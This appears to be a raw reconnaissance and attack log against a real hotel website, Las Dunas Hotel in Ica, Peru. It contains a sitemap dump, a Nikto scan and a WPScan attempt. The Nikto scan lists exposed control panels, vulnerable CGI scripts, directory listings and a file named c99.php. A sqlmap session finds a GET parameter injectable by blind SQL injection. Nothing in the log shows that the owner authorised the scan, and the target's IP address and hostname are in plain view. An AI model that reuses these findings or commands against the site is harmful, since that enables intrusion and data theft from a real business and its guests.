  725.   <changefreq>always</changefreq>
  726. </url>
  727. <url>
  728.   <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=5</loc>
  729.   <changefreq>always</changefreq>
  730. </url>
  731. <url>
  732.   <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=6</loc>
  733.   <changefreq>always</changefreq>
  734. </url>
  735. <url>
  736.   <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=30</loc>
  737.   <changefreq>always</changefreq>
  738. </url>
  739. <url>
  740.   <loc>http://lasdunashotel.com/galeria.php?pk_media_categoria=39</loc>
  741.   <changefreq>always</changefreq>
  742. </url>
  743. <url>
  744.   <loc>http://lasdunashotel.com/informacion-turistica.php</loc>
  745.   <changefreq>always</changefreq>
  746. </url>
  747. <url>
  748.   <loc>http://lasdunashotel.com/en/quienes_somos.php</loc>
  749.   <changefreq>always</changefreq>
  750. </url>
  751. <url>
  752.   <loc>http://lasdunashotel.com/en/habitaciones.php</loc>
  753.   <changefreq>always</changefreq>
  754. </url>
  755. <url>
  756.   <loc>http://lasdunashotel.com/en/servicios.php</loc>
  757.   <changefreq>always</changefreq>
  758. </url>
  759. <url>
  760.   <loc>http://lasdunashotel.com/en/paquetes.php</loc>
  761.   <changefreq>always</changefreq>
  762. </url>
  763. <url>
  764.   <loc>http://lasdunashotel.com/en/eventos.php</loc>
  765.   <changefreq>always</changefreq>
  766. </url>
  767. <url>
  768.   <loc>http://lasdunashotel.com/en/galeria.php</loc>
  769.   <changefreq>always</changefreq>
  770. </url>
  771. <url>
  772.   <loc>http://lasdunashotel.com/en/informacion.php</loc>
  773.   <changefreq>always</changefreq>
  774. </url>
  775. <url>
  776.   <loc>http://lasdunashotel.com/en/contactenos.php</loc>
  777.   <changefreq>always</changefreq>
  778. </url>
  779. <url>
  780.   <loc>http://lasdunashotel.com/en/banner-no-perder.php</loc>
  781.   <changefreq>always</changefreq>
  782. </url>
  783. <url>
  784.   <loc>http://lasdunashotel.com/en/recomienda.php</loc>
  785.   <changefreq>always</changefreq>
  786. </url>
  787. <url>
  788.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=2</loc>
  789.   <changefreq>always</changefreq>
  790. </url>
  791. <url>
  792.   <loc>http://lasdunashotel.com/compara.php</loc>
  793.   <changefreq>always</changefreq>
  794. </url>
  795. <url>
  796.   <loc>http://lasdunashotel.com/informacion-turistica-detalle.php</loc>
  797.   <changefreq>always</changefreq>
  798. </url>
  799. <url>
  800.   <loc>http://lasdunashotel.com/informacion-turistica-detalle-nazca.php</loc>
  801.   <changefreq>always</changefreq>
  802. </url>
  803. <url>
  804.   <loc>http://lasdunashotel.com/informacion-turistica-detalle-paracas.php</loc>
  805.   <changefreq>always</changefreq>
  806. </url>
  807. <url>
  808.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=2</loc>
  809.   <changefreq>always</changefreq>
  810. </url>
  811. <url>
  812.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=2</loc>
  813.   <changefreq>always</changefreq>
  814. </url>
  815. <url>
  816.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=3</loc>
  817.   <changefreq>always</changefreq>
  818. </url>
  819. <url>
  820.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=3</loc>
  821.   <changefreq>always</changefreq>
  822. </url>
  823. <url>
  824.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=4</loc>
  825.   <changefreq>always</changefreq>
  826. </url>
  827. <url>
  828.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=4</loc>
  829.   <changefreq>always</changefreq>
  830. </url>
  831. <url>
  832.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=5</loc>
  833.   <changefreq>always</changefreq>
  834. </url>
  835. <url>
  836.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=5</loc>
  837.   <changefreq>always</changefreq>
  838. </url>
  839. <url>
  840.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=6</loc>
  841.   <changefreq>always</changefreq>
  842. </url>
  843. <url>
  844.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=6</loc>
  845.   <changefreq>always</changefreq>
  846. </url>
  847. <url>
  848.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=7</loc>
  849.   <changefreq>always</changefreq>
  850. </url>
  851. <url>
  852.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=7</loc>
  853.   <changefreq>always</changefreq>
  854. </url>
  855. <url>
  856.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=8</loc>
  857.   <changefreq>always</changefreq>
  858. </url>
  859. <url>
  860.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=8</loc>
  861.   <changefreq>always</changefreq>
  862. </url>
  863. <url>
  864.   <loc>http://lasdunashotel.com/compara.php?pk_habitacion=9</loc>
  865.   <changefreq>always</changefreq>
  866. </url>
  867. <url>
  868.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=9</loc>
  869.   <changefreq>always</changefreq>
  870. </url>
  871. <url>
  872.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=12</loc>
  873.   <changefreq>always</changefreq>
  874. </url>
  875. <url>
  876.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=9</loc>
  877.   <changefreq>always</changefreq>
  878. </url>
  879. <url>
  880.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=7</loc>
  881.   <changefreq>always</changefreq>
  882. </url>
  883. <url>
  884.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=14</loc>
  885.   <changefreq>always</changefreq>
  886. </url>
  887. <url>
  888.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=11</loc>
  889.   <changefreq>always</changefreq>
  890. </url>
  891. <url>
  892.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=15</loc>
  893.   <changefreq>always</changefreq>
  894. </url>
  895. <url>
  896.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=18</loc>
  897.   <changefreq>always</changefreq>
  898. </url>
  899. <url>
  900.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=10</loc>
  901.   <changefreq>always</changefreq>
  902. </url>
  903. <url>
  904.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=13</loc>
  905.   <changefreq>always</changefreq>
  906. </url>
  907. <url>
  908.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=23</loc>
  909.   <changefreq>always</changefreq>
  910. </url>
  911. <url>
  912.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=33</loc>
  913.   <changefreq>always</changefreq>
  914. </url>
  915. <url>
  916.   <loc>http://lasdunashotel.com/galeria.php?IdGaleria=32</loc>
  917.   <changefreq>always</changefreq>
  918. </url>
  919. <url>
  920.   <loc>http://lasdunashotel.com/paquetes.php?pk_habitacion=</loc>
  921.   <changefreq>always</changefreq>
  922. </url>
  923. <url>
  924.   <loc>http://lasdunashotel.com/solicitar.php?salon=Sol%20de%20Ica</loc>
  925.   <changefreq>always</changefreq>
  926. </url>
  927. <url>
  928.   <loc>http://lasdunashotel.com/solicitar.php?salon=Presidente%20Ay%20B</loc>
  929.   <changefreq>always</changefreq>
  930. </url>
  931. <url>
  932.   <loc>http://lasdunashotel.com/solicitar.php?salon=Presidente%20A</loc>
  933.   <changefreq>always</changefreq>
  934. </url>
  935. <url>
  936.   <loc>http://lasdunashotel.com/solicitar.php?salon=Presidente%20B</loc>
  937.   <changefreq>always</changefreq>
  938. </url>
  939. <url>
  940.   <loc>http://lasdunashotel.com/solicitar.php?salon=Pozo%20santo</loc>
  941.   <changefreq>always</changefreq>
  942. </url>
  943. <url>
  944.   <loc>http://lasdunashotel.com/solicitar.php?salon=Dunas</loc>
  945.   <changefreq>always</changefreq>
  946. </url>
  947. <url>
  948.   <loc>http://lasdunashotel.com/en/registrese.php</loc>
  949.   <changefreq>always</changefreq>
  950. </url>
  951. <url>
  952.   <loc>http://lasdunashotel.com/en/index.php</loc>
  953.   <changefreq>always</changefreq>
  954. </url>
  955. <url>
  956.   <loc>http://lasdunashotel.com/en/banner-full-day.php</loc>
  957.   <changefreq>always</changefreq>
  958. </url>
  959. <url>
  960.   <loc>http://lasdunashotel.com/en/ubicacion.php</loc>
  961.   <changefreq>always</changefreq>
  962. </url>
  963. <url>
  964.   <loc>http://lasdunashotel.com/en/responsabilidad-social.php</loc>
  965.   <changefreq>always</changefreq>
  966. </url>
  967. <url>
  968.   <loc>http://lasdunashotel.com/en/sitemap.php</loc>
  969.   <changefreq>always</changefreq>
  970. </url>
  971. <url>
  972.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=1</loc>
  973.   <changefreq>always</changefreq>
  974. </url>
  975. <url>
  976.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=2</loc>
  977.   <changefreq>always</changefreq>
  978. </url>
  979. <url>
  980.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=3</loc>
  981.   <changefreq>always</changefreq>
  982. </url>
  983. <url>
  984.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=4</loc>
  985.   <changefreq>always</changefreq>
  986. </url>
  987. <url>
  988.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=5</loc>
  989.   <changefreq>always</changefreq>
  990. </url>
  991. <url>
  992.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=6</loc>
  993.   <changefreq>always</changefreq>
  994. </url>
  995. <url>
  996.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=7</loc>
  997.   <changefreq>always</changefreq>
  998. </url>
  999. <url>
  1000.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=8</loc>
  1001.   <changefreq>always</changefreq>
  1002. </url>
  1003. <url>
  1004.   <loc>http://lasdunashotel.com/en/habitaciones.php?pk_habitacion=9</loc>
  1005.   <changefreq>always</changefreq>
  1006. </url>
  1007. <url>
  1008.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=1</loc>
  1009.   <changefreq>always</changefreq>
  1010. </url>
  1011. <url>
  1012.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=1</loc>
  1013.   <changefreq>always</changefreq>
  1014. </url>
  1015. <url>
  1016.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=27</loc>
  1017.   <changefreq>always</changefreq>
  1018. </url>
  1019. <url>
  1020.   <loc>http://lasdunashotel.com/en/tarifas.php</loc>
  1021.   <changefreq>always</changefreq>
  1022. </url>
  1023. <url>
  1024.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=2</loc>
  1025.   <changefreq>always</changefreq>
  1026. </url>
  1027. <url>
  1028.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=3</loc>
  1029.   <changefreq>always</changefreq>
  1030. </url>
  1031. <url>
  1032.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=4</loc>
  1033.   <changefreq>always</changefreq>
  1034. </url>
  1035. <url>
  1036.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=5</loc>
  1037.   <changefreq>always</changefreq>
  1038. </url>
  1039. <url>
  1040.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=6</loc>
  1041.   <changefreq>always</changefreq>
  1042. </url>
  1043. <url>
  1044.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=7</loc>
  1045.   <changefreq>always</changefreq>
  1046. </url>
  1047. <url>
  1048.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=8</loc>
  1049.   <changefreq>always</changefreq>
  1050. </url>
  1051. <url>
  1052.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=11</loc>
  1053.   <changefreq>always</changefreq>
  1054. </url>
  1055. <url>
  1056.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=12</loc>
  1057.   <changefreq>always</changefreq>
  1058. </url>
  1059. <url>
  1060.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=13</loc>
  1061.   <changefreq>always</changefreq>
  1062. </url>
  1063. <url>
  1064.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=14</loc>
  1065.   <changefreq>always</changefreq>
  1066. </url>
  1067. <url>
  1068.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=17</loc>
  1069.   <changefreq>always</changefreq>
  1070. </url>
  1071. <url>
  1072.   <loc>http://lasdunashotel.com/en/servicios_detalle.php?pk_hotel_servicio=18</loc>
  1073.   <changefreq>always</changefreq>
  1074. </url>
  1075. <url>
  1076.   <loc>http://lasdunashotel.com/en/paquetes-request.php</loc>
  1077.   <changefreq>always</changefreq>
  1078. </url>
  1079. <url>
  1080.   <loc>http://lasdunashotel.com/en/eventos-salones.php</loc>
  1081.   <changefreq>always</changefreq>
  1082. </url>
  1083. <url>
  1084.   <loc>http://lasdunashotel.com/en/eventos-programas.php</loc>
  1085.   <changefreq>always</changefreq>
  1086. </url>
  1087. <url>
  1088.   <loc>http://lasdunashotel.com/en/cuestionario.php</loc>
  1089.   <changefreq>always</changefreq>
  1090. </url>
  1091. <url>
  1092.   <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=30</loc>
  1093.   <changefreq>always</changefreq>
  1094. </url>
  1095. <url>
  1096.   <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=3</loc>
  1097.   <changefreq>always</changefreq>
  1098. </url>
  1099. <url>
  1100.   <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=4</loc>
  1101.   <changefreq>always</changefreq>
  1102. </url>
  1103. <url>
  1104.   <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=5</loc>
  1105.   <changefreq>always</changefreq>
  1106. </url>
  1107. <url>
  1108.   <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=6</loc>
  1109.   <changefreq>always</changefreq>
  1110. </url>
  1111. <url>
  1112.   <loc>http://lasdunashotel.com/en/galeria.php?pk_media_categoria=39</loc>
  1113.   <changefreq>always</changefreq>
  1114. </url>
  1115. <url>
  1116.   <loc>http://lasdunashotel.com/en/informacion-turistica.php</loc>
  1117.   <changefreq>always</changefreq>
  1118. </url>
  1119. <url>
  1120.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=2</loc>
  1121.   <changefreq>always</changefreq>
  1122. </url>
  1123. <url>
  1124.   <loc>http://lasdunashotel.com/en/compara.php</loc>
  1125.   <changefreq>always</changefreq>
  1126. </url>
  1127. <url>
  1128.   <loc>http://lasdunashotel.com/en/informacion-turistica-detalle.php</loc>
  1129.   <changefreq>always</changefreq>
  1130. </url>
  1131. <url>
  1132.   <loc>http://lasdunashotel.com/en/informacion-turistica-detalle-nazca.php</loc>
  1133.   <changefreq>always</changefreq>
  1134. </url>
  1135. <url>
  1136.   <loc>http://lasdunashotel.com/en/informacion-turistica-detalle-paracas.php</loc>
  1137.   <changefreq>always</changefreq>
  1138. </url>
  1139. <url>
  1140.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=2</loc>
  1141.   <changefreq>always</changefreq>
  1142. </url>
  1143. <url>
  1144.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=2</loc>
  1145.   <changefreq>always</changefreq>
  1146. </url>
  1147. <url>
  1148.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=3</loc>
  1149.   <changefreq>always</changefreq>
  1150. </url>
  1151. <url>
  1152.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=3</loc>
  1153.   <changefreq>always</changefreq>
  1154. </url>
  1155. <url>
  1156.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=4</loc>
  1157.   <changefreq>always</changefreq>
  1158. </url>
  1159. <url>
  1160.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=4</loc>
  1161.   <changefreq>always</changefreq>
  1162. </url>
  1163. <url>
  1164.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=5</loc>
  1165.   <changefreq>always</changefreq>
  1166. </url>
  1167. <url>
  1168.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=5</loc>
  1169.   <changefreq>always</changefreq>
  1170. </url>
  1171. <url>
  1172.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=6</loc>
  1173.   <changefreq>always</changefreq>
  1174. </url>
  1175. <url>
  1176.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=6</loc>
  1177.   <changefreq>always</changefreq>
  1178. </url>
  1179. <url>
  1180.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=7</loc>
  1181.   <changefreq>always</changefreq>
  1182. </url>
  1183. <url>
  1184.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=7</loc>
  1185.   <changefreq>always</changefreq>
  1186. </url>
  1187. <url>
  1188.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=8</loc>
  1189.   <changefreq>always</changefreq>
  1190. </url>
  1191. <url>
  1192.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=8</loc>
  1193.   <changefreq>always</changefreq>
  1194. </url>
  1195. <url>
  1196.   <loc>http://lasdunashotel.com/en/compara.php?pk_habitacion=9</loc>
  1197.   <changefreq>always</changefreq>
  1198. </url>
  1199. <url>
  1200.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=9</loc>
  1201.   <changefreq>always</changefreq>
  1202. </url>
  1203. <url>
  1204.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=12</loc>
  1205.   <changefreq>always</changefreq>
  1206. </url>
  1207. <url>
  1208.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=9</loc>
  1209.   <changefreq>always</changefreq>
  1210. </url>
  1211. <url>
  1212.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=7</loc>
  1213.   <changefreq>always</changefreq>
  1214. </url>
  1215. <url>
  1216.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=14</loc>
  1217.   <changefreq>always</changefreq>
  1218. </url>
  1219. <url>
  1220.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=11</loc>
  1221.   <changefreq>always</changefreq>
  1222. </url>
  1223. <url>
  1224.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=15</loc>
  1225.   <changefreq>always</changefreq>
  1226. </url>
  1227. <url>
  1228.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=18</loc>
  1229.   <changefreq>always</changefreq>
  1230. </url>
  1231. <url>
  1232.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=10</loc>
  1233.   <changefreq>always</changefreq>
  1234. </url>
  1235. <url>
  1236.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=13</loc>
  1237.   <changefreq>always</changefreq>
  1238. </url>
  1239. <url>
  1240.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=23</loc>
  1241.   <changefreq>always</changefreq>
  1242. </url>
  1243. <url>
  1244.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=33</loc>
  1245.   <changefreq>always</changefreq>
  1246. </url>
  1247. <url>
  1248.   <loc>http://lasdunashotel.com/en/galeria.php?IdGaleria=32</loc>
  1249.   <changefreq>always</changefreq>
  1250. </url>
  1251. <url>
  1252.   <loc>http://lasdunashotel.com/en/paquetes.php?pk_habitacion=</loc>
  1253.   <changefreq>always</changefreq>
  1254. </url>
  1255. <url>
  1256.   <loc>http://lasdunashotel.com/en/solicitar.php?salon=Sol%20de%20Ica</loc>
  1257.   <changefreq>always</changefreq>
  1258. </url>
  1259. <url>
  1260.   <loc>http://lasdunashotel.com/en/solicitar.php?salon=Presidente%20Ay%20B</loc>
  1261.   <changefreq>always</changefreq>
  1262. </url>
  1263. <url>
  1264.   <loc>http://lasdunashotel.com/en/solicitar.php?salon=Presidente%20A</loc>
  1265.   <changefreq>always</changefreq>
  1266. </url>
  1267. <url>
  1268.   <loc>http://lasdunashotel.com/en/solicitar.php?salon=Presidente%20B</loc>
  1269.   <changefreq>always</changefreq>
  1270. </url>
  1271. <url>
  1272.   <loc>http://lasdunashotel.com/en/solicitar.php?salon=Pozo%20santo</loc>
  1273.   <changefreq>always</changefreq>
  1274. </url>
  1275. <url>
  1276.   <loc>http://lasdunashotel.com/en/solicitar.php?salon=Dunas</loc>
  1277.   <changefreq>always</changefreq>
  1278. </url>
  1279. </urlset>
  1280. + -- --=[Checking cookie attributes on www.lasdunashotel.com...
  1281.  
  1282.  
  1283. - Nikto v2.1.6
  1284. ---------------------------------------------------------------------------
  1285. + Target IP:          192.185.26.214
  1286. + Target Hostname:    www.lasdunashotel.com
  1287. + Target Port:        80
  1288. + Start Time:         2015-09-29 12:24:49 (GMT-4)
  1289. ---------------------------------------------------------------------------
  1290. + Server: nginx/1.8.0
  1291. + The anti-clickjacking X-Frame-Options header is not present.
  1292. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  1293. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  1294. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  1295. + /cgi-sys/formmail.cgi: The remote CGI reveals its version number, which may aid attackers in finding vulnerabilities in the script.
  1296. + /cgi-sys/formmail.pl: Many versions of FormMail have remote vulnerabilities, including file access, information disclosure and email abuse. FormMail access should be restricted as much as possible or a more secure solution found.
  1297. + /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
  1298. + /securecontrolpanel/: Web Server Control Panel
  1299. + /webmail/: Web based mail package installed.
  1300. + /cgi-sys/Count.cgi: This may allow attackers to execute arbitrary commands on the server
  1301. + OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
  1302. + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
  1303. + OSVDB-2117: /cpanel/: Web-based control panel
  1304. + OSVDB-3092: /cgi-sys/entropysearch.cgi?query=asdfasdf&user=root&basehref=%2F%2Fwww.yourdomain.com/: CPanel's Entropy Search allows username enumeration via the user parameter.
  1305. + OSVDB-3092: /cgi-sys/FormMail-clone.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
  1306. + OSVDB-3268: /includes/: Directory indexing found.
  1307. + OSVDB-3092: /includes/: This might be interesting...
  1308. + OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  1309. + OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  1310. + OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
  1311. + OSVDB-3268: /images/: Directory indexing found.
  1312. + OSVDB-3268: /style/: Directory indexing found.
  1313. + OSVDB-6694: /.DS_Store: Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.
  1314. + /controlpanel/: Admin login page/section found.
  1315. + Server leaks inodes via ETags, header found with file /cgi-sys/c99.php, fields: 0x54643954 0x875e
  1316. + 8634 requests: 0 error(s) and 25 item(s) reported on remote host
  1317. + End Time:           2015-09-29 13:26:36 (GMT-4) (3707 seconds)
  1318. ---------------------------------------------------------------------------
  1319. + 1 host(s) tested
  1320. _______________________________________________________________
  1321.         __          _______   _____                  
  1322.         \ \        / /  __ \ / ____|                
  1323.          \ \  /\  / /| |__) | (___   ___  __ _ _ __  
  1324.           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
  1325.            \  /\  /  | |     ____) | (__| (_| | | | |
  1326.             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
  1327.  
  1328.         WordPress Security Scanner by the WPScan Team
  1329.                        Version 2.8
  1330.           Sponsored by Sucuri - https://sucuri.net
  1331.    @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
  1332. _______________________________________________________________
  1333.  
  1334.  
  1335. [!] [!] The remote website is up, but does not seem to be running WordPress.
  1336. [ERROR] Website Unreachable: http://www.lasdunashotel.com
  1337.          _
  1338.  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150928}
  1339. |_ -| . | |     | .'| . |
  1340. |___|_  |_|_|_|_|__,|  _|
  1341.       |_|           |_|   http://sqlmap.org
  1342.  
  1343. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1344.  
  1345. [*] starting at 13:27:16
  1346.  
  1347. do you want to check for the existence of site's sitemap(.xml) [y/N] n
  1348. [13:27:16] [INFO] starting crawler
  1349. [13:27:16] [INFO] searching for links with depth 1
  1350. [13:27:28] [INFO] searching for links with depth 2                            
  1351. please enter number of threads? [Enter for 1 (current)] 1
  1352. [13:27:28] [WARNING] running in a single-thread mode. This could take a while
  1353. [13:27:33] [INFO] 5/17 links visited (29%)
  1354. sqlmap got a 301 redirect to 'http://www.lasdunashotel.com/en/'. Do you want to follow? [Y/n] Y
  1355. [13:27:46] [INFO] searching for links with depth 3                            
  1356. please enter number of threads? [Enter for 1 (current)] 1
  1357. [13:27:46] [WARNING] running in a single-thread mode. This could take a while
  1358. [13:29:07] [INFO] searching for links with depth 4                            
  1359. please enter number of threads? [Enter for 1 (current)] 1
  1360. [13:29:07] [WARNING] running in a single-thread mode. This could take a while
  1361. [13:31:47] [INFO] searching for links with depth 5                            
  1362. please enter number of threads? [Enter for 1 (current)] 1
  1363. [13:31:47] [WARNING] running in a single-thread mode. This could take a while
  1364. do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
  1365. [13:33:06] [INFO] sqlmap got a total of 181 targets
  1366. URL 1:
  1367. GET http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=73&pk_habitacion=
  1368. do you want to test this URL? [Y/n/q]
  1369. > Y
  1370. [13:33:06] [INFO] testing URL 'http://www.lasdunashotel.com/paquetes-detalle.php?pk_paquete_especial=73&pk_habitacion='
  1371. [13:33:06] [INFO] using '/root/.sqlmap/output/results-09292015_0133pm.csv' as the CSV results file in multiple targets mode
  1372. [13:33:07] [INFO] testing connection to the target URL
  1373. [13:33:10] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
  1374. do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] N
  1375. [13:33:10] [INFO] testing if the target URL is stable
  1376. [13:33:10] [INFO] target URL is stable
  1377. [13:33:10] [INFO] testing if GET parameter 'pk_paquete_especial' is dynamic
  1378. [13:33:11] [WARNING] GET parameter 'pk_paquete_especial' does not appear dynamic
  1379. [13:33:13] [INFO] heuristics detected web page charset 'ascii'
  1380. [13:33:13] [INFO] heuristic (basic) test shows that GET parameter 'pk_paquete_especial' might be injectable (possible DBMS: 'MySQL')
  1381. [13:33:13] [INFO] heuristic (XSS) test shows that GET parameter 'pk_paquete_especial' might be vulnerable to XSS attacks
  1382. [13:33:13] [INFO] testing for SQL injection on GET parameter 'pk_paquete_especial'
  1383. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
  1384. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
  1385. [13:33:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  1386. [13:33:23] [WARNING] reflective value(s) found and filtering out
  1387. [13:33:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  1388. [13:34:47] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  1389. [13:35:22] [INFO] GET parameter 'pk_paquete_especial' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
  1390. [13:35:22] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  1391. [13:35:22] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  1392. [13:35:22] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  1393. [13:35:23] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
  1394. [13:35:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
  1395. [13:35:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
  1396. [13:35:25] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
  1397. [13:35:25] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (BIGINT UNSIGNED)'
  1398. [13:35:25] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
  1399. [13:35:41] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
  1400. [13:35:41] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
  1401. [13:35:41] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
  1402. [13:35:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
  1403. [13:35:42] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
  1404. [13:35:42] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
